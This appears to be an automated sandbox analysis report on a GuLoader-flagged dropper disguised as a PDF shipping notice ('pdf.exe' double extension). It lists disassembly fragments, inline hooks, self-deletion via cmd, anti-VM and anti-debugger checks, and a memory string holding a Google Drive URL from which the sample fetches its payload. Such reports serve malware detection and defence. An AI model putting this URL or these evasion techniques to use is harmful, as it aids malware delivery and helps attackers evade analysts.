Source:	Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source:	Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_00403EA8 push es; ret	1_2_00403EB7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_00406105 pushfd ; ret	1_2_00406106
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_004057C0 push esp; ret	1_2_004057C1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B63C50 pushad ; retf	1_2_02B63C51
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6593E push di; ret	1_2_02B65969
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6590E push di; ret	1_2_02B65969
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B65372 pushfd ; ret	1_2_02B65379
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6255E push edx; retf	1_2_02B6255F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F08CD push ecx; mov dword ptr [esp], ecx	6_2_1E9F08D6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_005740AC push 8482D2CCh; retf	6_2_005740B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FB08CD push ecx; mov dword ptr [esp], ecx	8_2_02FB08D6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281C0DA push edx; ret	8_2_0281C0DE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_028171D9 push es; retf	8_2_028171DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281D4A5 push eax; ret	8_2_0281D4F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281D4F2 push eax; ret	8_2_0281D4F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281D4FB push eax; ret	8_2_0281D562
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281D55C push eax; ret	8_2_0281D562
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281696B push ebp; ret	8_2_0281696C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281DE1A push ss; iretd	8_2_0281DE21

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	File created: \arrival notice, cia awb inv form.pdf.exe
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	File created: \arrival notice, cia awb inv form.pdf.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xED

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"			Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Show sources

Source: Possible double extension: pdf.exe

Static PE information: Arrival Notice, CIA Awb Inv Form.pdf.exe

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16IGYRUBEYI1SLH2LFQBJS2GGTY9BFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE(Q^

Source: C:\Windows\explorer.exe TID: 4296	Thread sleep count: 160 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4296	Thread sleep time: -320000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432	Thread sleep time: -222000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Code function: 6_2_1EA6CE40 rdtsc

6_2_1EA6CE40

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

System information queried: ModuleInformation

Jump to behavior

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707817785.000000001066F000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe(Q^
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWlS
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Code function: 6_2_1EA6CE40 rdtsc

6_2_1EA6CE40

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6F8FD mov eax, dword ptr fs:[00000030h]	1_2_02B6F8FD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B718FC mov eax, dword ptr fs:[00000030h]	1_2_02B718FC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B70232 mov eax, dword ptr fs:[00000030h]	1_2_02B70232
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6C602 mov eax, dword ptr fs:[00000030h]	1_2_02B6C602
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2CEA0 mov eax, dword ptr fs:[00000030h]	6_2_1EA2CEA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h]	6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h]	6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h]	6_2_1EA22EB8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h]	6_2_1EA22EB8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1BE80 mov eax, dword ptr fs:[00000030h]	6_2_1EA1BE80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AE89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AE89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAEEE7 mov eax, dword ptr fs:[00000030h]	6_2_1EAAEEE7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h]	6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h]	6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h]	6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA93EFC mov eax, dword ptr fs:[00000030h]	6_2_1EA93EFC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA77EC3 mov eax, dword ptr fs:[00000030h]	6_2_1EA77EC3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA77EC3 mov ecx, dword ptr fs:[00000030h]	6_2_1EA77EC3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4EC1 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4EC1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BED0 mov eax, dword ptr fs:[00000030h]	6_2_1EA2BED0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]	6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]	6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]	6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]	6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB9ED2 mov eax, dword ptr fs:[00000030h]	6_2_1EAB9ED2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA31ED8 mov eax, dword ptr fs:[00000030h]	6_2_1EA31ED8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3EE2 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3EE2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EBE18 mov ecx, dword ptr fs:[00000030h]	6_2_1E9EBE18
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]	6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]	6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]	6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]	6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h]	6_2_1EA86E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h]	6_2_1EA86E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]	6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA85E30 mov ecx, dword ptr fs:[00000030h]	6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]	6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]	6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]	6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]	6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2CE3F mov eax, dword ptr fs:[00000030h]	6_2_1EA2CE3F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3E01 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3E01
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]	6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]	6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]	6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]	6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F2E32 mov eax, dword ptr fs:[00000030h]	6_2_1E9F2E32
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4E03 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4E03
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA28E15 mov eax, dword ptr fs:[00000030h]	6_2_1EA28E15
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]	6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]	6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]	6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]	6_2_1EA6FE1F
